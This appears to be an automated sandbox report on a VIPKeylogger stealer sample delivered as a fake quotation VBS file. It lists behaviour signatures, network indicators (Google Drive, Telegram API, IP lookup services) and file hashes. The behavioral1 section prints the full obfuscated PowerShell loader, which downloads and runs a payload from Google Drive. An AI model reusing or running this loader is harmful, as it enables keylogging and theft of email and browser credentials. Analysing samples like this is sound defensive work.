Malware Analysis Report

2024-11-30 14:56

Sample ID 241101-gbae1axgkp
Target cb79db36a5a57ef1bad70615aa6d8bb2b293c31d1ead57ce7d16efc387172c2f.r00
SHA256 cb79db36a5a57ef1bad70615aa6d8bb2b293c31d1ead57ce7d16efc387172c2f
Tags execution vipkeylogger collection discovery keylogger stealer
Score 10/10

Analysis Overview

score
10/10

SHA256

cb79db36a5a57ef1bad70615aa6d8bb2b293c31d1ead57ce7d16efc387172c2f

Threat Level: Known bad

The file cb79db36a5a57ef1bad70615aa6d8bb2b293c31d1ead57ce7d16efc387172c2f.r00 was found to be: Known bad.

Malicious Activity Summary

execution vipkeylogger collection discovery keylogger stealer

VIPKeylogger

Vipkeylogger family

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

outlook_win_path

outlook_office_path

Suspicious behavior: MapViewOfSection

Analysis: static1

Detonation Overview

Reported

2024-11-01 05:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-01 05:37

Reported

2024-11-01 05:39

Platform

win7-20240903-en

Max time kernel

150s

Max time network

117s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241030_Pdf.vbs"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241030_Pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Chefkahytter forforstrkeren Stipendiary Aglossa Optegnendes #>;$Fllesmarkeder='Crinet';<#Suppressedly Regnskabsadministration ministerielle Addeem Inviolate Blanketters Unperfectedness #>; function Dksdrengene($glottalise){If ($host.DebuggerEnabled) {$Homomorphic144++;}$Peberms=$Bildkkene+$glottalise.'Length'-$Homomorphic144; for ( $Sheveret=5;$Sheveret -lt $Peberms;$Sheveret+=6){$coccygomorphic=$Sheveret;$Monoplegic+=$glottalise[$Sheveret];}$Monoplegic;}function Chaplin($Skrvebanens){ & ($Samtaleemnets) ($Skrvebanens);}$Umaadelighedens=Dksdrengene 'JimsoML,ndioAnthez eneaiJong,lCassylJed,yaSwabb/Papir ';$Flabellate=Dksdrengene ' isbuTPres l de fsCi il1Coldp2M.ckl ';$Hoste=' Noni[JanglnUn coeGentiT Vent. eateSHjforePart rHypotvTi,skiMindecMillie HawapsaneroStoreI SortNPreacTCognimDilata ToxinChewya Hom g Tilhe RechrUdetj] Arbe:inter:Varmts Telee Dyppc ekruUFuse.R Lat ID lseTSubdiY DisapKeltiRSels oP einTArb jo atsucDicynoSmrreLSpeed=Abamp$FimrefFo maLBu,ikA Gy nBShi.iEDis oLFilmsLT,onsA ArcftPalteeDiffe ';$Umaadelighedens+=Dksdrengene 'Coy,o5L.nds.backi0 aby Ejend(YampaWPro riHauntnH drod orhaoTittlwProsksTreet EctypNP repTSpnen over 1Remna0 Disp. anc0 Perr;tun,t Ac eWRe ruiHand n Tilg6Sagsb4P xie;Unawk Flerexdi ul6Under4Satsn;Skate ErindrRabbiv Clup:St nd1Tippe3 ,ilo1 mmet. C rr0 He.r)Skri ommaGFdepue kompc hoejk PolloBhuta/Kanal2Voves0elect1Tumbe0Ni,zs0Kolle1Xeno,0Svmm 1 Hype BrkkeFVirkeiChapprPe iteDubitfExocroDoctrxUskyl/Mlkeg1Mreng3Skrdd1Ar,vr..etti0Deci ';$Nedenstaaende=Dksdrengene 'Rke nUSviklSKei tEJaevnRCorra-Unr.sABan lgLa,dge EnevnPunsttHubri ';$Ekspatrieres=Dksdrengene 'Mainph onpht egnet fuldp ira scongl:Krubu/Tryk./CemendPh.torNormaiSkattvRealieKunst.vitrygGuileoSlvfao Omstg Tikrl ebraeBim t. Me oc BomboCountmHuspl/HusleuFarvec Klan? 
ossteParadxPeritpChayooUnve,rWifectO den=brepodIndbao mmanwQuad.nUrethlOrganoBabyeaBevb dGorsi& .heoiPail d Pike= apsa1PossePPotenKCircux DiaxMstatsT R,diDDaa seOverc3HenrehSampaq Char4 U.orJRolfdN Kaf KPopulXSla ntSammec Ka ixAstro-KrambKHyperTTmmerZAdullnDatais Unp 5 omspv Re,rOThanjlAdstrp rsnoUn onw,edegdEs,oi ';$Ambari=Dksdrengene 'Eksal> Stif ';$Samtaleemnets=Dksdrengene 'Tran iFagudEHerskX amat ';$Sethite='Flynders';$Clotildes='\Kondemnations.Stu';Chaplin (Dksdrengene 'Torne$Ele tGP ysolTinseoFaktobEmptna ,qualAnthr:datasUM lonv d udr quipGMatkaEFormiLDatalI sjlegSupertUnre,= Disc$Eti leSamstnArachVAccre:falceADkninpSinclPWoodjDHusmnA JaetTInapoA onos+ Mili$AktivCSolskL YpuroDigittSo,gsICog.alEpitodDiploE Ultrs Rese ');Chaplin (Dksdrengene 'Nonma$TightG sterlDruesOSilkibMingla O,isLSmote: RathKPriodI MelilrefekdPaloneforhoS UnveKStaveA.ndretGengiT astee D,gslNov.lOKonfivMes ieambignPakkeeHodopSMusic=Wei.h$ rutsECl.akK Drn sHauynp AmiaALngdetChampRS.netI.igorEMisprrW.ippesnustSAffor. elveSNiflipReverL spuniCraniTChara( Pylo$Re lyaD skeMRompeB .ustaCorpoRRepariAviga)Orth ');Chaplin (Dksdrengene $Hoste);$Ekspatrieres=$Kildeskattelovenes[0];$ekstasens=(Dksdrengene ' Gor.$StorhG HoveL AfpeoAnnusBHadenaK mmoLCoqui:TruanP HistAForhalUn inARombueBarcoo Bookn amnie TrevMSvirvEKo trrGynnatKristISide NVauquEDete A Madl=AriasnExtr,eS,efaWBrand-AdmeaO moribBuckoJba cheDbuinC WellT Uddr OpnaaSmi asY Vsk,sClibaT Co,tec untMPolly. uarnNOeconEkildeT Fors.FletfWlumineFiskebDong c GentlJournIOkayse addlN ForuTfiske ');Chaplin ($ekstasens);Chaplin (Dksdrengene 'Under$ForkoPEmp.daAbdiclLampeaHaffieFul eoKy,linImprieGldssmCha,oeUncomr Bilat HangiGalopn Firee U deaShowu. 
SeriHZ lueeBranda Resed SankeCrumbrtonefsPenid[Dakty$Co ybNlatakerealedHovede Sk.an,maadsTusintNocena TopmaModk eTh,lenStalad unmue udic],arit=Sorte$Mell UWrangmTil aaSchleaPseudd Undse AmphlWeekeiDr ekgBorehhRampoeChilddHa sheImplenNon,psUnder ');$Stvfrie=Dksdrengene 'Voldg$MortiPU graabadgelLagonaC,evaeDelinoP ojenHurlieBo tfmsjakaeMen erNe frt Ashli ruppn,ilereInco a Nond.VssunD ToteoOpka wRengrnfo nulStvrioSkraaaYugaddgenerFFee,siSpagelReswie Deli(Wampu$T kstEExorckRe,ersF evapSortiaSkrivtElverrtransiExploeUimodrHakkeeFrem.sRepro,Nucl $Co teC atodrCykele ,lidsTres iEvangvOdon eParoc)Skrm ';$Cresive=$Uvrgeligt;Chaplin (Dksdrengene 'Metod$A sthG Li,vLBedetoUnderBRedemaLrestLGyldi:GerniD BlehISt rkS Lovek Ki.eA Symbn BetoT SesseOra gNUnfur=Udsvi(PatenT Hoveeforu SBilgkTErgot-SejlaPLuksuAcar vT.iktuh Un e Potb$ HexdCHj idrPsykieUndeps Id.nIVaredV ncoresocag)Vejle ');while (!$Diskanten) {Chaplin (Dksdrengene 'Masto$Hushtg ,lasl RhaboAltmubHoneyaBa milHype,:A ridSPakket m ltoPredirs.aldfS hoooB llerPriorb Ba,brStagguDecargKorseepraecrNoneasFotoa=,amac$ S.aet ucurCes pucalimeWivec ') ;Chaplin $Stvfrie;Chaplin (Dksdrengene 'Bark sMik oT ShinaSkinkrM croTChawb-NewfasSandwLProkleN.natEannmap Hink Sport4R,gnh ');Chaplin (Dksdrengene ' Part$MiksegIntraLBorgeoEddadbMachiADilatl Stea:Descad osiICastiSSuperKSmokeAH.llanEngo.TImpenEAtomanParec= Dens(UndelT Uds E plumsRepawtUddan-Chau.p OpbaaKo.materhveHNe.fo Pa e$meg lCI drerShagtegaardS.sychIGenopv UrnfeBackb)Dr.in ') ;Chaplin (Dksdrengene 'Mijn $Sinh GHvlveLZaithoGoldwbJenlgaMy teL A si:GrnttoPerikRTal,tAAut.kT etbuo KonfRTumidlPersoiTor,ekPreexeMobil5 He.e=Imm n$Me icg DdskLSpra oMisbeb Monoa TwisLex,an:.easeSSciamuContrBEmeroO Cla b .oudLNitriIAtommq Mel u inseEbeskiLSkaffY ande+ ubge+Umrke%Nonwh$TandrKSk,diIAtom LCap rdF,rdue edbeSBy nikC,ustA,ollatCu bstHulkoE ozerLVa,iooUnpriVDisprE adion RowtenamessRetro.Ser,ecPeripOSemipU SnvsN jarkTPrinc ') 
;$Ekspatrieres=$Kildeskattelovenes[$Oratorlike5];}$Kloningens=291747;$Telexes=30474;Chaplin (Dksdrengene 'Antir$SortsgD.shalDictaO GormbPilheA RekrL inot:paaskB NonmE .ellNtkkelD olstE.chmoeFol eSFiske Skri=posty GrungEleaneDispotMikro-RetsfCgigaboH,rpsNSp bat t ruEU worNi.dhaTAutoe Ungra$Ho.otcDephyrDarkleStjflsbevilIClac.vQuadretid a ');Chaplin (Dksdrengene 'Peace$Nondig arbelRekoro.olfbbKnotna yleblSlutt:ExaspAArsend ovpre Sph l ManubGnaveeBerasrLa.ultOverl Theo=feci, Sp,ci[ Ca dS Sa ayH.mmesMai itlexipeGelinmSpade.miniaC KirkoOpalinAwarevPsil eGrsserRiccitGodm ]rrel : Oxya: R.keFUncanr ForaoBygdemPelagB Ra daA maisBo tpeUd in6Paatv4BrandSemmottHyd.trConv i VirinR ombg sthn(Busin$PersiBAnkyle EspanBoksedSkjuleSy teeKonkus Oilt)Streg ');Chaplin (Dksdrengene ' Dele$HonniG,alveLAl,ogO YoghBCustoaTuttslMaksi:ObjekSGoniowUnconiCorneLBr,llLRyk.eb raveoMlkenw SamlL Ends Kaske=Nunci Lever[Sockes LivlyFi.riSChro t.arsreOverlmHandw.NominTAseiseHam lXFuseltflles.DraabeNonilnBaranCPreacOBog.pdVideriArm.rnJoustGSlagv] Spil:Tiltv:Over aCoendSLandiCDeco,iDiscriExant.Skre GPsykoeSheltT S ksSTrollTTri crPeshkIFlydenO phaGUnap.(B rde$TribaaLinoldStatiET ntelSkilnberhveeTh ncrLectiTSyste) Kapi ');Chaplin (Dksdrengene 'Monos$ issegMotivlKvkkeoM tacb Cen.AB ugtlOprik:ZoomiF JubioStayerFortefSwartrCrumbeRegissHonni=T,del$UddybS HjerWFinkmiIngrelB dirl.lbanBArctoO H roW verflBilop.EfterS mateuPeridbTaanesMil iTJo neRGe riIUnpr,n ,latgFrede(I fra$ P ndKF,owslAdr soPulviNBibetiTutteNForesg,ekvieSol dN Tu.tSKalib,Piar $IsdantSekseE oreoLNonsiED ltrx sm keWilkeSChoco)Amph, ');Chaplin $Forfres;"

Network

N/A

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-01 05:37

Reported

2024-11-01 05:39

Platform

win10v2004-20241007-en

Max time kernel

144s

Max time network

141s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241030_Pdf.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Vipkeylogger family

vipkeylogger

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | checkip.dyndns.org | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241030_Pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.195:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 checkip.dyndns.org udp
US 193.122.130.0:80 checkip.dyndns.org tcp
US 8.8.8.8:53 0.130.122.193.in-addr.arpa udp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 152.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdg1qak5.the.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 44a071b5b03cdad0f233428b60507ab2
SHA1 fb2a6cb8abb0cccd428614e39cc9eb4c983cfb87
SHA256 b75bf24e17edc409cb664bd10198b4fef5f5166d510e13f9370efaafd9c8a6e4
SHA512 ffde66357926f5345190fe6f97f25bc5a4d8c6db6b62ff3f261f68b02cda396d6e8101d3f18b4fda53223652b0bbfda1577711379573c6f58cdf96110257c851

C:\Users\Admin\AppData\Roaming\Kondemnations.Stu

MD5 d3eaa25322d53ddaef4b33d72552badf
SHA1 4d703e333fce51d3849a1467268437b89d0cf239
SHA256 d35582b6c56ab0068075a1a5e338cd0d24c381673cf959eca45e516fedf471f3
SHA512 60aa35eb0d284caab596550fe1218af035c4ba38e29196436c0f3e09f89b87d51a7bdf680995f260ab08e6b44d9e4f564cc589c3c63cbfb98598ace3ea5becd1
